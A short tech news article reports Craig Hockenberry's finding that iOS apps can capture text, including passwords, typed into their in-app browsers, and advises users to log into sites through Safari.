If you regularly use an iPhone or iPad app that uses a built-in browser, you could be vulnerable to a major vulnerability in iOS that allows unscrupulous app developers to spy on your typing.
The vulnerability was discovered by Craig Hockenberry, one of the developers behind Twitter for iOS, who has taken to his blog to warn iOS users about the security issues inherent in using in-app browsers: namely, that an app can spy on everything that is being entered in its in-app browser.
Hockenberry posted a video and a proof-of-concept app to show the vulnerability in action. As you can see, it can even capture passwords.
Hockenberry explains the hack:
– The information at the top of the screen is generated by the app, not the web page. This information could easily be uploaded to remote server.
– This is not phishing: the site shown is the actual Twitter website. This technique can be applied to any site that has a input form. All the attacker needs to know can easily be obtained by viewing the public facing HTML on the site.
– The site content is also modified: the text on the button label is normally “Sign in” and has been changed to “SUCK IT UP”. It seemed appropriate.
– This technique works in iOS 7 and 8 (and probably earlier versions, but I didn’t have an easy way to test them).
Basically, until this is fixed, you should think twice about logging into any third-party site through an in-app browser. Instead, you should only log into web sites with Safari, not any sites that use iOS’s in-app browser… which, unfortunately, includes third-party iOS browsers like Chrome.